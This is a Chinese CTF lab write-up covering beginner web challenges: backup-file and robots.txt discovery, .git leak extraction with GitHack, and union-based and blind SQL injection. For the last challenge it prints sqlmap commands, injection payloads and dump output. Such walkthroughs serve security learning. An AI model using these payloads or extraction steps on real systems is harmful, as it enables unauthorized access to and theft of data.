[第一章 web入門]
常見的搜集
打開網頁,可以知道考的是敏感檔案
常見的敏感檔案有:
- gedit備份檔案,格式為filename,比如index.php
- vim備份檔案,格式為.filename.swp或者*.swo或者*.swn,比 如.index.php.swp
- robots.txt
嘗試先檢視robots.txt檔案,檢視這個flag1_is_her3_fun.txt檔案,得到flag1
再者,嘗試檢視備份檔案.index.php.swp,得到flag3
那flag2呢?最後是在index.php~檔案中找到flag2
合并的到flag
粗心的小李
通過提示,猜測應該是git洩露
使用工具:GitHack
進入GitHack的目錄,使用指令`GitHack.py URL/.git/
提示我們index.html
這時候打開GitHack路徑中新增的檔案夾(也就是輸入的域名)裡面有一個index.html,點開它(用浏覽器打開)
打開index.html檔案,得到flag
SQL注入-1
打開環境,看到一段話,沒啥提示
既然是SQL注入,那麼就尋找注入點,嘗試尋找報錯
加上單引号,報錯,好的,開始嘗試聯合注入
判斷出來有三列,繼續
回顯位為2,3 ,構造sql語句
查到目前資料庫下有兩個表
檢視fa4g這個表,查到一個字段fllllag
檢視字段,得到flag
SQL注入-2
提示說:請通路 /login.php /user.php
先登入,通路login.php,
習慣性地檢視一下源代碼,哎,有個提示,可以在url後加入?tips=1 開啟mysql錯誤提示,使用burp發包就可以看到啦
然後再随便輸入一個賬号和密碼,url并沒有發生變化,判斷sql注入方式是POST
另一個界面應該是登入界面,但還沒有登入,顯然要先登陸,才能進入第二個界面
嘗試注入,使用sqlmap注入,根據第一個界面的提示,傳入參數tip=1,并抓包,儲存為post.txt檔案
運作sqlmap,
python sqlmap.py -r myfile/post.txt
結果為
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: name=admin' AND 3116=3116 AND 'vxEi'='vxEi&pass=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 7436 FROM (SELECT(SLEEP(5)))SGJx) AND 'KZbR'='KZbR&pass=admin
可以看出可以采用時間盲注進行注入
接下來一步一步的進行注入
爆資料庫資訊
python sqlmap.py -r myfile/post.txt --current-db
-
current database: 'note'
-
爆表
python sqlmap.py -r myfile/post.txt -D note --tables
-
+-------+
| fl4g |
| users |
+-------+
-
爆字段
python sqlmap.py -r myfile/post.txt -D note -T fl4g --columns
-
+--------+-------------+
| Column | Type |
+--------+-------------+
| flag | varchar(40) |
+--------+-------------+
-
檢視flag的資料
python sqlmap.py -r myfile/post.txt -D note -T fl4g -C flag --dump
-
n1book{login_ssli_is_nice}
-
flag出來了,也沒有用到 /user.php